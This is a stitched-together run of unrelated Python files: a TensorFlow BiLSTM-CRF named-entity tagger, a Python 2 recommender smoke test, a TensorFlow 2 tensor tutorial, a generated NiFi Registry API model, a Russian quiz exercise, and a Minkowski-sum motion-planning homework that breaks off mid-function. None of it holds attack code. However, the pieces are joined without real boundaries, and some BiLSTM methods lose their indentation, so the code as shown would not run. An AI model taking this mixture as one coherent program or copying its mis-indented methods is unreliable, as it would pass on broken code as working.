                                                             state_keep_prob=1 - self.params['dropout'][1])
                (output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, merged,
                                                                            dtype=tf.float64)
                merged = tf.concat([output_fw, output_bw], axis=-1)
                '''
                merged_input = Bidirectional(LSTM(size, return_sequences=True, dropout=self.params['dropout'][0],
                                                  recurrent_dropout=self.params['dropout'][1]),
                                             name='shared_varLSTM_' + str(cnt))(merged_input)
                '''
            else:
                """ Naive dropout """
                (output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, merged,
                                                                            dtype=tf.float64)
                merged = tf.concat([output_fw, output_bw], axis=-1)
                merged = tf.layers.Dropout(self.params['dropout'],
                                           name='shared_dropout_'+ str(cnt))(merged)
                '''
                merged_input = Bidirectional(LSTM(size, return_sequences=True), name='shared_LSTM_' + str(cnt))(
                    merged_input)
                if self.params['dropout'] > 0.0:
                    merged_input = TimeDistributed(Dropout(self.params['dropout']),
                                                   name='shared_dropout_' + str(self.params['dropout']) + "_" + str(
                                                       cnt))(merged_input)
                '''
            print(cnt, 'BiLSTM Shape:', merged.shape)
            cnt += 1
        # Flatten (batch, time, 2*units) -> (batch*time, 2*units) for the dense layer.
        merged = tf.reshape(merged, [-1, self.params['LSTM-Size'][-1]*2])
        if self.params['classifier'].lower() == 'softmax':
            merged = tf.layers.Dense(len(self.params['labelEntries']),
                                     activation=self.activation_map['softmax'], name='output')(merged)
            merged = tf.reshape(merged, [-1, merged_input_shape[-2], len(self.params['labelEntries'])])
            loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=label, logits=merged)
            output = tf.argmax(merged, axis=-1, name="softmax_output")
            '''
            output = TimeDistributed(Dense(len(self.params['labelEntries']),
                                           activation='softmax'), name='output')(merged_input)
            lossFct = 'sparse_categorical_crossentropy'
            acc = 'sparse_categorical_accuracy'
            '''
        elif self.params['classifier'].upper() == 'CRF':
            # Linear projection to label scores, then a CRF layer for
            # sequence-level decoding/likelihood (tf.contrib.crf).
            merged = tf.layers.Dense(len(self.params['labelEntries']), name="hidden_lin_layer")(merged)
            merged = tf.reshape(merged, [-1, merged_input_shape[-2], len(self.params['labelEntries'])])
            merged = tf.cast(merged, tf.float32)
            log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(merged,
                                                                                  label, sentence_length)
            loss = -log_likelihood
            output, viterbi_score = tf.contrib.crf.crf_decode(merged, transition_params, sentence_length)
            output = tf.identity(output, name="crf_output")
            score = tf.identity(viterbi_score, name="score")
            '''
            output = TimeDistributed(Dense(len(self.params['labelEntries']), activation=None),
                                     name='hidden_lin_layer')(merged_input)
            crf = CRF(len(self.params['labelEntries']), learn_mode=self.params['crf']['learn-mode'],
                      test_mode=self.params['crf']['test-mode'], sparse_target=True, name='output')
            output = crf(output)
            lossFct = crf.loss_function
            acc = crf.accuracy
            '''
        print('Output Shape:', output.shape)
        lossFct = tf.reduce_mean(loss, name='loss')
        precision = tf.metrics.precision(label, output, name='precision')
        recall = tf.metrics.recall(label, output, name='recall')
        # Pass everything except bookkeeping keys straight to the optimizer.
        optimizerParams = {k: v for k, v in self.params['optimizer'].items() if k not in ['type', 'clipnorm', 'clipvalue']}
        #optimizerParams['name'] = 'train_op'
        if self.params['optimizer']['type'].lower() == 'adam':
            opt = tf.train.AdamOptimizer(**optimizerParams)
        elif self.params['optimizer']['type'].lower() == 'nadam':
            opt = tf.contrib.opt.NadamOptimizer(**optimizerParams)
        elif self.params['optimizer']['type'].lower() == 'rmsprop':
            opt = tf.train.RMSPropOptimizer(**optimizerParams)
        elif self.params['optimizer']['type'].lower() == 'adadelta':
            opt = tf.train.AdadeltaOptimizer(**optimizerParams)
        elif self.params['optimizer']['type'].lower() == 'adagrad':
            opt = tf.train.AdagradOptimizer(**optimizerParams)
        elif self.params['optimizer']['type'].lower() == 'sgd':
            opt = tf.train.GradientDescentOptimizer(**optimizerParams)
        # Gradient clipping: by norm always, by value only when clipvalue != 0.
        grad_vars = opt.compute_gradients(lossFct)
        grad_vars = [
            (tf.clip_by_norm(grad, self.params['optimizer']['clipnorm']), var)
            if grad is not None else (grad, var)
            for grad, var in grad_vars]
        if abs(self.params['optimizer']['clipvalue']) > 0:
            grad_vars = [
                (tf.clip_by_value(grad, -abs(self.params['optimizer']['clipvalue']),
                                  abs(self.params['optimizer']['clipvalue'])), var)
                if grad is not None else (grad, var)
                for grad, var in grad_vars]
        opt.apply_gradients(grad_vars, name='train_op')
    def printSummary(self):
        """Placeholder for a model-summary printer; not implemented."""
        pass
    def setRawDataset(self, dataset):
        """Encode a raw dataset in place and attach it to the model.

        dataset: dict with 'data' (grouped sentences of token dicts) and
        'labelEntries' (label inventory).
        """
        # NOTE(review): dataEncoding() runs *before* labelEntries is replaced,
        # so encoding uses the label inventory currently in self.params --
        # confirm the dataset's labelEntries always matches it.
        self.dataEncoding(dataset['data'])
        self.params['labelEntries'] = dataset['labelEntries']
        self.dataset = dataset
        self.datagenerator=self.dataGenerator()
def setDataset(self, dataset):
self.dataset = dataset
self.params['labelEntries'] = self.dataset['labelEntries']
self.datagenerator = self.dataGenerator()
    def dataEncoding(self, data, inBatch=True, hasLabel=True):
        """Encode token dicts in place into numeric features.

        Each word dict loses its 'surface'/'token' and 'analyses' keys and
        gains: 'char' (padded char-id list), 'casing' (casing-class id),
        'lemma' (word id, if 'tokens' enabled), 'pos' (multi-hot list) and,
        when hasLabel, 'label' (one-element label-id list).

        data    : groups of sentences (or a single group when inBatch=False)
        inBatch : whether *data* is already a list of groups
        hasLabel: whether to encode gold labels
        """
        # Encoding data
        def getCasing(word):
            """Returns the casing for a word"""
            casing = 'other'
            numDigits = 0
            numUpper = 0
            for char in word:
                if char.isdigit():
                    numDigits += 1
                if char.isupper():
                    numUpper += 1
            digitFraction = numDigits / float(len(word))
            upperFraction = numUpper / float(len(word))
            if word.isdigit(): # Is a digit
                casing = 'numeric'
            elif digitFraction > 0.5:
                casing = 'mainly_numeric'
            elif upperFraction > 0.5:
                casing = 'mainly_allUpper'
            elif word.islower(): # All lower case
                casing = 'allLower'
            elif word.isupper(): # All upper case
                casing = 'allUpper'
            elif word[0].isupper(): # is a title, initial char upper, then all lower
                casing = 'initialUpper'
            elif upperFraction > 0:
                casing = 'contains_upper'
            elif numDigits > 0:
                casing = 'contains_digit'
            return casing
        # Multi-hot encode a collection of indices over anything2Idx's keys.
        def encode(array, anything2Idx):
            encoded = [0 for _ in anything2Idx]
            for _ in array:
                encoded[_] = 1
            return encoded
        # Budget per half when truncating over-long words (2 padding slots kept).
        limit = (self.params['character']['maxCharLength'] - 2) // 2
        casing2Idx = {v: k for k, v in enumerate(self.params['casingEntries'])}
        pos2Idx = {v: k for k, v in enumerate(self.params['posEntries'])}
        label2Idx = {v: k for k, v in enumerate(self.params['labelEntries'])}
        groups = data
        if not inBatch:
            groups = [data]
        for group in groups:
            for sent in group:
                for word in sent:
                    char = word.pop('surface') if 'surface' in word.keys() else word.pop('token')
                    surface = char
                    # Padding
                    if char == 'PADDING_TOKEN':
                        word['char'] = [self.char2Idx['PADDING']
                                        for _ in range(self.params['character']['maxCharLength'])]
                        #word['casing'] = encode([casing2Idx['PADDING']], casing2Idx)
                        word['casing'] = casing2Idx['PADDING']
                        if 'tokens' in self.params['featureNames']:
                            word['lemma'] = self.word2Idx['PADDING_TOKEN']
                        word['pos'] = encode([pos2Idx['PADDING']], pos2Idx)
                        #word['label'] = encode([label2Idx[word['label']]], label2Idx)
                        word['label'] = [label2Idx[word['label']]]
                        continue
                    # Casing Encoding
                    # word['casing'] = encode([casing2Idx.get(getCasing(char), casing2Idx['other'])], casing2Idx)
                    word['casing'] = casing2Idx.get(getCasing(char), casing2Idx['other'])
                    # Char Encoding
                    # Over-long words keep their first and last `limit` characters.
                    if len(char) > self.params['character']['maxCharLength'] - 2:
                        char = char[:limit] + char[-limit:]
                    char = [self.char2Idx.get(_, self.char2Idx['UNKNOWN']) for _ in char]
                    char.insert(0, self.char2Idx['PADDING'])
                    char.extend([self.char2Idx['PADDING']
                                 for _ in range(len(char), self.params['character']['maxCharLength'])])
                    word['char'] = char
                    # Lemma and POS Encoding
                    word['lemma'] = self.word2Idx.get(word.get('lemma')) or self.word2Idx['UNKNOWN_TOKEN']
                    analyses = word.pop('analyses')
                    if len(analyses) == 0:
                        # No morphological analyses: fall back to lemma, then
                        # the raw surface form, then UNKNOWN.
                        if 'tokens' in self.params['featureNames']:
                            word['lemma'] = self.word2Idx.get(word.get('lemma')) or\
                                            self.word2Idx.get(surface) or\
                                            self.word2Idx['UNKNOWN_TOKEN']
                        word['pos'] = encode([pos2Idx['UNKNOWN']], pos2Idx)
                    else:
                        if 'tokens' in self.params['featureNames']:
                            lemmas = set([_[0].get('canon') or _[0]['base'] for _ in analyses])
                            # Multiple distinct candidate lemmas -> ambiguous.
                            if len(set([_.replace('+', '') for _ in lemmas])) > 1:
                                word['lemma'] = self.word2Idx['AMBIGUOUS_TOKEN']
                            else:
                                # Try successive normalisations ('+'->'|',
                                # '-'->'|', then each analysis' base form)
                                # until one hits the vocabulary.
                                word['lemma'] = self.word2Idx['UNKNOWN_TOKEN']
                                for _ in lemmas:
                                    lemma = _.replace('+', '|')
                                    if lemma in self.word2Idx.keys():
                                        word['lemma'] = self.word2Idx[lemma]
                                        break
                                if word['lemma'] == self.word2Idx['UNKNOWN_TOKEN']:
                                    for _ in lemmas:
                                        lemma = _.replace('-', '|')
                                        if lemma in self.word2Idx.keys():
                                            word['lemma'] = self.word2Idx[lemma]
                                            break
                                if word['lemma'] == self.word2Idx['UNKNOWN_TOKEN']:
                                    for analysis in analyses:
                                        if analysis[-1]['base'] in self.word2Idx.keys():
                                            word['lemma'] = self.word2Idx[analysis[-1]['base']]
                                            break
                        # POS is multi-hot over all analyses' tags.
                        POS = set([pos2Idx.get(analysis[-1]['pos'], pos2Idx['other']) for analysis in analyses])
                        word['pos'] = encode(POS, pos2Idx)
                    # Label Encoding
                    # word['label'] = encode([label2Idx[word['label']]], label2Idx)
                    if hasLabel:
                        try:
                            word['label'] = [label2Idx[word['label']]]
                        except KeyError:
                            # Unknown gold label: report and abort encoding.
                            print(word['label'])
                            print('Label entries not matched with model')
                            return
    def dataGenerator(self):
        """Infinite generator of feed_dicts (placeholder name -> numpy batch).

        Walks each group in self.dataset['data'] in miniBatchSize slices,
        shuffling each slice, and cycles back to the first group forever.
        """
        k = 0  # current group index
        i = 0  # start offset within the current group
        while True:
            k = k % len(self.dataset['data'])
            j = min(i + self.params['miniBatchSize'], len(self.dataset['data'][k]))
            data = self.dataset['data'][k][i:j]
            # Shuffles the slice copy; the stored dataset order is unchanged.
            np.random.shuffle(data)
            x = {}
            if 'tokens' in self.params['featureNames']:
                x['tokens_input:0'] = np.array([[_['lemma'] for _ in sent] for sent in data])
            if 'character' in self.params['featureNames']:
                x['chars_input:0'] = np.array([[_['char'] for _ in sent] for sent in data])
            if 'pos' in self.params['featureNames']:
                x['pos_input:0'] = np.array([[_['pos'] for _ in sent] for sent in data])
            if 'casing' in self.params['featureNames']:
                x['casing_input:0'] = np.array([[_['casing'] for _ in sent] for sent in data])
            x.update({'label:0': np.array([[_['label'][0] for _ in sent] for sent in data])})
            x.update({'sentence_length:0': np.array([len(sent) for sent in data])})
            yield x
            # Advance within the group, or move on to the next group.
            if j == len(self.dataset['data'][k]):
                i = 0
                k += 1
            else:
                i = j
def model_predict(self, dict):
if self.params['classifier'].lower() == 'softmax':
result = self.session.run('softmax_output:0', feed_dict=dict)
elif self.params['classifier'].upper() == 'CRF':
result, score = self.session.run(['crf_output:0', 'score:0'], feed_dict=dict)
return result
    def fit(self):
        """Train for params['epoch'] epochs, reporting loss and a running
        F1 built from streaming precision/recall; stops early once the score
        stops improving for more than params['earlyStopping'] epochs."""
        if self.session is None:
            self.session = tf.Session()
            self.session.run(tf.global_variables_initializer())
            # Local variables back the streaming precision/recall metrics.
            self.session.run(tf.local_variables_initializer())
        best_score = 0
        score = 0
        counter = 0
        for epoch in range(self.params['epoch']):
            progress = trange(self.dataset['num_sents'] // self.params['miniBatchSize'] + 1)
            progress.set_description('Epoch '+str(epoch))
            for _ in progress:
                batch = next(self.datagenerator)
                self.session.run('train_op', feed_dict=batch)
                # NOTE(review): metrics are the *cumulative* update_op values,
                # not per-batch scores -- confirm that is intended.
                loss, precision, recall = self.session.run(['loss:0', 'precision/update_op:0', 'recall/update_op:0'],
                                                           feed_dict=batch)
                if precision == 0 and recall == 0:
                    score = 0
                else:
                    score = 2 * precision * recall / (precision + recall)
                progress.set_postfix_str(
                    f'loss: %f, prec: %f, rec: %f, f1-score: %f' % (loss, precision, recall, score))
            # Early Stopping
            if score > best_score + 0.001:
                counter = 0
                best_score = score
            elif abs(best_score - score) < 0.001:
                counter += 1
            if counter > self.params['earlyStopping']:
                print('Early Stopped')
                break
    def predict(self, tokens, toTag=False):
        """Predict label sequences for already-encoded sentences.

        tokens: iterable of sentences (lists of encoded word dicts).
        toTag : when True, convert predictions to label strings via
                params['labelEntries'] instead of returning raw model output.
        Returns one prediction list per sentence (batch size 1 per sentence).
        """
        sents = []
        for sent in tokens:
            x = {}
            if 'tokens' in self.params['featureNames']:
                x['tokens_input:0'] = np.array([[_['lemma'] for _ in sent]])
            if 'character' in self.params['featureNames']:
                x['chars_input:0'] = np.array([[_['char'] for _ in sent]])
            if 'pos' in self.params['featureNames']:
                x['pos_input:0'] = np.array([[_['pos'] for _ in sent]])
            if 'casing' in self.params['featureNames']:
                x['casing_input:0'] = np.array([[_['casing'] for _ in sent]])
            x.update({'sentence_length:0': np.array([len(sent)])})
            y_pred = self.model_predict(x)[0]
            if not toTag:
                sents.append(y_pred)
            else:
                # NOTE(review): elements may already be label indices (CRF
                # decode); argmax over the last axis is then a no-op reduce --
                # confirm for the softmax path.
                y_pred = [_.argmax(axis=-1) for _ in y_pred]
                sents.append([self.params['labelEntries'][_] for _ in y_pred])
        return sents
    def evaluate(self, dataset, sortedBySize=False):
        """Print a sklearn classification report over an encoded dataset.

        sortedBySize=True feeds each group as one batch (assumes uniform
        sentence length per group); otherwise sentences go through predict()
        one at a time.
        """
        y_true = [w['label'][0] for g in dataset['data'] for s in g for w in s]
        if sortedBySize:
            data = dataset['data']
            y_pred = []
            for g in data:
                x = {}
                if 'tokens' in self.params['featureNames']:
                    x['tokens_input:0'] = np.array([[_['lemma'] for _ in sent] for sent in g])
                if 'character' in self.params['featureNames']:
                    x['chars_input:0'] = np.array([[_['char'] for _ in sent] for sent in g])
                if 'pos' in self.params['featureNames']:
                    x['pos_input:0'] = np.array([[_['pos'] for _ in sent] for sent in g])
                if 'casing' in self.params['featureNames']:
                    x['casing_input:0'] = np.array([[_['casing'] for _ in sent] for sent in g])
                x.update({'sentence_length:0': np.array([len(sent) for sent in g])})
                y_g_pred = self.model_predict(x)
                y_pred.extend([pred.argmax() for sent in y_g_pred for pred in sent])
        else:
            y_pred = [w.argmax() for g in dataset['data'] for s in self.predict(g) for w in s]
        # Score only the entity labels; 'O' (last index) is excluded.
        validLabels = [_ for _ in self.params['labelEntries'] if _ != 'O']
        print(classification_report(y_true, y_pred, labels=[_ for _ in range(len(validLabels))],
                                    target_names=validLabels))
    def saveModel(self, path=None, initial_save=False, global_step=None):
        """Save the TF checkpoint plus params/word2Idx (as JSON inside an
        HDF5 config file) under *path* or params['modelSavePath'].

        initial_save: write the meta graph too (needed once per model).
        global_step : optional step suffix for the checkpoint files.
        """
        import json, h5py
        directory = path or self.params['modelSavePath']
        self.params['modelSavePath'] = directory
        if not os.path.exists(directory):
            os.makedirs(directory)
        tf.train.Saver().save(self.session, os.path.join(directory, 'model'),
                              global_step=global_step, write_meta_graph=initial_save)
        #self.model.save(os.path.join(directory, 'model.h5'), True)
        with h5py.File(os.path.join(directory, 'config.h5'), 'w') as f:
            f.attrs['params'] = json.dumps(self.params)
            f.attrs['word2Idx'] = json.dumps(self.word2Idx)
    @staticmethod
    def loadModel(path='bilstm-fin-ner'):
        """Restore a model saved by saveModel(): read params/word2Idx from
        config.h5, rebuild a BiLSTM shell (word2Idx given -> early return in
        __init__) and restore the latest TF checkpoint into a new session."""
        import tensorflow as tf
        import json, h5py, os, sys
        sys.path.append(os.path.abspath(os.path.dirname(__file__)))
        with h5py.File(os.path.join(path, 'config.h5'), 'r') as f:
            params = json.loads(f.attrs['params'])
            word2Idx = json.loads(f.attrs['word2Idx'])
        params['modelSavePath'] = path
        model = BiLSTM(params=params, word2Idx=word2Idx)
        model.session = tf.Session()
        saved_model = tf.train.import_meta_graph(os.path.join(path, 'model.meta'))
        saved_model.restore(model.session, tf.train.latest_checkpoint(path))
        #model.model = keras.models.load_model(os.path.join(path, 'model.h5'), custom_objects=create_custom_objects())
        return model
if __name__ == '__main__':
    # Quick training smoke test: fit the model on a pickled Finnish NER sample.
    import pickle
    # from BiLSTM import BiLSTM
    sample = pickle.load(open('finnish_sample.pkl', 'rb'))
    model = BiLSTM(raw_dataset=sample)
    model.fit()
    #model.saveModel(path='test', initial_save=True)
# Smoke-test script for the user/item collaborative-filtering similarity module.
# NOTE: Python 2 syntax (bare `print` statement below) — this cannot run on Python 3.
import main.core.similarity as sim
from main.info import config
# Configure item-based CF with adjusted-cosine similarity.
# Config() is presumably a shared singleton whose changes take effect via
# apply_changes() — TODO confirm against main.info.config.
config.Config().configdict['user_item_CF']['model'] = 'item-based'
config.Config().configdict['user_item_CF']['similarity'] = 'adjusted_cos'
config.Config().apply_changes()
dao = sim.new_DAO_interface()
sim.init_user_mean_matrix(dao)
# Top-100 most similar items to item 313 under adjusted cosine.
# The result is discarded — likely intended for an interactive session.
sim.get_other_item_sim(313,dao)[:100]
# Switch to plain cosine and recompute for comparison.
config.Config().configdict['user_item_CF']['similarity'] = 'cos'
config.Config().apply_changes()
print ""
sim.get_other_item_sim(313,dao)[:100]
|
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers, optimizers, datasets
# TensorFlow 2.x tensor-basics walkthrough, organized as notebook cells
# (separated by "# In[]:"). Each cell demonstrates one concept and prints it.
a = tf.constant(1)  # scalar tensor
print(a.device)  # device the tensor is placed on (CPU/GPU)
b = tf.range(4)
print(b)
print(b.device)
print(b.numpy())
print(b.ndim)  # number of dimensions
print(tf.rank(b))  # rank, returned as a Tensor
print(tf.ones([3,4,2]))  # 3-D tensor of ones
print(tf.ones([3,4,2]).ndim, tf.rank(tf.ones([3,4,2])))  # both report rank 3
# In[]:
a = tf.constant([1., 2.])  # float vector
b = tf.constant([True, False])
c = tf.constant('hello world')
d = np.arange(4)
print(isinstance(a, tf.Tensor))  # works, but not the recommended check
print(tf.is_tensor(b))  # preferred tensor-type check
print(tf.is_tensor(d))
print(a.dtype, b.dtype, c.dtype, d.dtype)
print(a.dtype == tf.float32, c.dtype == tf.string)
# In[]:
a = np.arange(5)
print(a.dtype)
aa = tf.convert_to_tensor(a, dtype=tf.int32)
print(aa.dtype, tf.is_tensor(aa))
# In[]:
# dtype conversion with tf.cast
b = tf.cast(aa, dtype=tf.float32)
aaa = tf.cast(aa, dtype=tf.double)
print(aaa)
print(tf.cast(aaa, dtype=tf.int32))
b = tf.constant([0,1])
bb = tf.cast(b, dtype=tf.bool)
print(bb)
print(tf.cast(bb, dtype=tf.int32))
# In[]:
# Trainable variables for gradient tracking: tf.Variable
a = tf.range(5)  # Tensor -> Variable
b = tf.Variable(a, name="input_data")
print(b.dtype, b.name, b.trainable)  # gradient info recorded automatically
print(isinstance(b, tf.Tensor))  # misleading result; avoid isinstance here
print(isinstance(b, tf.Variable))
print(tf.is_tensor(b))
c = np.arange(5)  # NumPy array -> Variable
d = tf.Variable(c, name="input_data")
print(d.dtype, d.name, d.trainable)  # gradient info recorded automatically
print(isinstance(d, tf.Tensor))  # misleading result; avoid isinstance here
print(isinstance(d, tf.Variable))
print(tf.is_tensor(d))
print(b.numpy())
print(d.numpy())
a = tf.ones([])
print(a, a.numpy())
print(int(a), float(a))  # direct conversion requires a scalar tensor
# In[]:
print(tf.convert_to_tensor(np.ones([2,3,3])))
print(tf.convert_to_tensor([1, 2.]))  # mixed literals are promoted to float32
print(tf.convert_to_tensor([[1], [2.]]))
print("-"*30)
print(tf.zeros([]))
print(tf.zeros([1]))
print(tf.zeros([1,2]))
print(tf.zeros([2,3,3]))
# In[]:
a = tf.zeros([2,3,3])
print(tf.zeros_like(a))  # equivalent to the next line
print(tf.zeros(a.shape))
print("-"*30)
print(tf.ones(1))
print(tf.ones([]))
print(tf.ones([2]))
print(tf.ones([2,3]))
print(tf.ones_like(a))
# In[]:
print(tf.fill([2,2], 0))
print(tf.fill([2,2], 9.0))
# In[]:
print(tf.random.normal([2,2], mean=1, stddev=1))  # normal distribution
print(tf.random.truncated_normal([2,2], mean=0, stddev=1))  # truncated normal
print(tf.random.uniform([3,4], minval=0, maxval=1, dtype=tf.float32))  # uniform
# In[]:
idx = tf.range(10)
idx = tf.random.shuffle(idx)
a = tf.random.normal([10, 784], mean=0, stddev=1)
b = tf.random.uniform([10], maxval=10, dtype=tf.int32)
# tf.gather: select rows of a tensor by a 1-D index array — here it applies
# the same shuffled order to both tensors.
a = tf.gather(a, idx)
b = tf.gather(b, idx)
print(a)
print(b)
# In[]:
# tf.convert_to_tensor and tf.constant largely overlap in functionality.
a = tf.constant(1)
print(a)
b = tf.constant([1])
print(b)
c = tf.constant([[1,2,3],[4,5,6]])
print(c)
print("-"*30)
print(tf.convert_to_tensor(1))
print(tf.convert_to_tensor([1]))  # dtype inferred from the literal
print(tf.convert_to_tensor([[1,2,3],[4,5,6]]))
# In[]:
out = tf.random.uniform([2, 3], seed=1)
print(out)
y = tf.range(2)
y = tf.one_hot(y, depth=3)
print(y)
loss = tf.keras.losses.mse(y, out)  # mse = mean squared error (rmse would be the root)
print(loss)
loss = tf.reduce_mean(loss)  # average over the batch
print(loss)
print("--------------------------------------------------------------------")
# 1. Single-step computation:
loss = tf.reduce_mean(tf.square(y - out))  # mean over all elements (least squares)
print(loss)
# 2. Two-step: mean per row, then mean over rows:
loss = tf.reduce_mean(tf.square(y - out), axis=1)
loss = tf.reduce_mean(loss, axis=0)
print(loss)
# 3. Two-step with explicit sums and divisions:
loss = tf.reduce_sum(tf.square(y - out), axis=1) / y.shape[1]
loss = tf.reduce_sum(loss) / y.shape[0]
print(loss)
# In[]:
# Gotchas explained (original note, kept verbatim below):
# 1. layers.Dense(10) fixes the OUTPUT width at 10; with input x of shape
#    (4, 8) the kernel w must be (8, 10) so that x @ w works.
# 2. bias is the offset b, with dimension 10.
'''
#这里有坑:
#1、layers.Dense(10)是指输出的列个数为10,由于输入x是4:8的,又由于使用的是x * w = x(4:8) * w(?:10),那么w的行个数就为8。
#2、bias就是偏移量b,维度为10。
'''
net = layers.Dense(10)
net.build((4, 8))  # declare the input shape
print(net.kernel)
print(net.bias)
# In[]:
x = tf.random.normal([4, 784])
net = layers.Dense(10)  # fully-connected layer
net.build((4, 784))  # input shape
print(net(x).shape)  # output shape
print(net.kernel.shape)  # weight matrix
print(net.bias.shape)  # bias vector
# In[]:
#(x_train, y_train), (x_test, y_test) = datasets.imdb.load_data(num_words=10000)
#x_train = keras.preprocessing.sequence.pad_sequences(x_train, maxlen=80) # 80 words per review
#print(x_train.shape)
#
#emb = embedding(x_train)
#print(emb.shape)
#
#out = rnn(emb[:4])
#print(out.shape)
# coding: utf-8
"""
Apache NiFi Registry REST API
The REST API provides an interface to a registry with operations for saving, versioning, reading NiFi flows and components.
OpenAPI spec version: 1.19.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class AccessPolicy(object):
    """Model of a NiFi Registry access policy (swagger-generated schema).

    ``swagger_types`` maps each attribute name to its declared type and
    ``attribute_map`` maps each attribute name to its JSON key.
    NOTE: originally produced by swagger-codegen; the public interface
    (class attributes, constructor, properties, dict/str helpers) is kept
    byte-compatible with the generated version.
    """

    swagger_types = {
        'identifier': 'str',
        'resource': 'str',
        'action': 'str',
        'configurable': 'bool',
        'revision': 'RevisionInfo',
        'users': 'list[Tenant]',
        'user_groups': 'list[Tenant]'
    }

    attribute_map = {
        'identifier': 'identifier',
        'resource': 'resource',
        'action': 'action',
        'configurable': 'configurable',
        'revision': 'revision',
        'users': 'users',
        'user_groups': 'userGroups'
    }

    def __init__(self, identifier=None, resource=None, action=None, configurable=None, revision=None, users=None, user_groups=None):
        """Build an AccessPolicy; ``resource`` and ``action`` are required
        and are validated through their property setters."""
        self._identifier = None
        self._resource = None
        self._action = None
        self._configurable = None
        self._revision = None
        self._users = None
        self._user_groups = None
        if identifier is not None:
            self.identifier = identifier
        # Required fields: assigned unconditionally so the setters can
        # reject a missing (None) value.
        self.resource = resource
        self.action = action
        if configurable is not None:
            self.configurable = configurable
        if revision is not None:
            self.revision = revision
        if users is not None:
            self.users = users
        if user_groups is not None:
            self.user_groups = user_groups

    @property
    def identifier(self):
        """str: id of the policy, set by the server at creation time."""
        return self._identifier

    @identifier.setter
    def identifier(self, identifier):
        self._identifier = identifier

    @property
    def resource(self):
        """str: the resource this access policy applies to (required)."""
        return self._resource

    @resource.setter
    def resource(self, resource):
        if resource is None:
            raise ValueError("Invalid value for `resource`, must not be `None`")
        self._resource = resource

    @property
    def action(self):
        """str: the action granted by this policy; one of read/write/delete."""
        return self._action

    @action.setter
    def action(self, action):
        if action is None:
            raise ValueError("Invalid value for `action`, must not be `None`")
        allowed_values = ["read", "write", "delete"]
        if action not in allowed_values:
            raise ValueError(
                "Invalid value for `action` ({0}), must be one of {1}"
                .format(action, allowed_values)
            )
        self._action = action

    @property
    def configurable(self):
        """bool: whether the configured Authorizer allows editing this policy."""
        return self._configurable

    @configurable.setter
    def configurable(self, configurable):
        self._configurable = configurable

    @property
    def revision(self):
        """RevisionInfo: revision used for optimistic locking during updates."""
        return self._revision

    @revision.setter
    def revision(self, revision):
        self._revision = revision

    @property
    def users(self):
        """list[Tenant]: user IDs associated with this access policy."""
        return self._users

    @users.setter
    def users(self, users):
        self._users = users

    @property
    def user_groups(self):
        """list[Tenant]: user-group IDs associated with this access policy."""
        return self._user_groups

    @user_groups.setter
    def user_groups(self, user_groups):
        self._user_groups = user_groups

    def to_dict(self):
        """Return the model's properties as a plain dict, recursing into
        nested models, lists and dicts."""
        def _convert(value):
            # Recurse into anything that itself knows how to become a dict.
            if isinstance(value, list):
                return [item.to_dict() if hasattr(item, "to_dict") else item
                        for item in value]
            if hasattr(value, "to_dict"):
                return value.to_dict()
            if isinstance(value, dict):
                return {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                        for key, val in value.items()}
            return value

        return {name: _convert(getattr(self, name))
                for name in self.swagger_types}

    def to_str(self):
        """Return a pretty-printed string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """Used by `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Equal when *other* is an AccessPolicy with identical state."""
        return isinstance(other, AccessPolicy) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
|
# Task 3, variant 6.
# Prints the name "Samuel Langhorne Clemens" and asks for his pen name;
# the program joins the two strings and prints them separated by a dash.
# Ivanov S. E.
# 19.09.2016
PSEUDONYM = "Марк Твен"
NAME = "Самюэл Ленгхорн Клеменс"
print("Герой нашей сегодняшней программы - %s" % NAME)
answer = input("Под каким же именем мы знаем этого человека? Ваш ответ: ")
if answer == PSEUDONYM:
    print("Всё верно: {} - {}".format(NAME, PSEUDONYM))
else:
    print("Неверный ответ")
input("\nНажмите Enter для выхода.")
|
import argparse
import os
from typing import List, Tuple, Dict
from Plotter import Plotter
from shapely.geometry.polygon import Polygon, LineString, orient
from shapely.geometry import Point
from math import atan2
from math import pi
import numpy as np
###########################################
# Algorithmic Motion Planning (236610) ##
# John Noonan and Eli Shafer ##
# Homework 1 ##
# November 2019 ##
###########################################
def get_minkowsky_sum(original_shape: Polygon, r: float) -> Polygon:
    """
    Get the polygon representing the Minkowsky sum
    :param original_shape: The original obstacle
    :param r: The radius of the rhombus
    :return: The polygon composed from the Minkowsky sums
    """
    # Reorient the polygon so that vertices are in counter-clockwise direction
    original_shape = orient(original_shape, sign=1.0)
    obstacle = np.array(original_shape.exterior.coords)
    # Drop the duplicated closing vertex, then append the first two vertices
    # again so obstacle[j + 1] stays valid during the final merge steps.
    obstacle = np.append(obstacle[:-1], obstacle[:2], 0)
    # Rhombus robot centered at the origin, padded the same way with two
    # wrap-around vertices. NOTE(review): the merge assumes both vertex lists
    # start at the bottom-most vertex — the driver rotates the obstacle's
    # vertices to guarantee this; confirm for other callers.
    robot = np.array([(0, -r), (r, 0), (0, r), (-r, 0), (0, -r), (r, 0)])
    m = len(obstacle) - 2  # number of real obstacle vertices
    n = 4                  # number of real robot vertices
    poly_sum = []
    i = 0
    j = 0
    # Classic convex Minkowski-sum merge: at each step emit the sum of the
    # current vertex pair, then advance along whichever polygon's outgoing
    # edge has the smaller polar angle.
    while i < n or j < m:
        poly_sum.append(robot[i] + obstacle[j])
        robot_diff = robot[i + 1] - robot[i]
        obstacle_diff = obstacle[j + 1] - obstacle[j]
        angle_robot = atan2(robot_diff[1], robot_diff[0])
        # Make sure all angles are positive
        if angle_robot < 0:
            angle_robot += 2 * pi
        angle_obs = atan2(obstacle_diff[1], obstacle_diff[0])
        if angle_obs < 0:
            angle_obs += 2 * pi
        # If we complete all vertices on the polygon, we have completed a revolution.
        # All angles thereafter are the angle plus one revolution.
        if i >= n:
            angle_robot += 2 * pi
        if j >= m:
            angle_obs += 2 * pi
        if angle_robot < angle_obs:
            i += 1
        elif angle_robot > angle_obs:
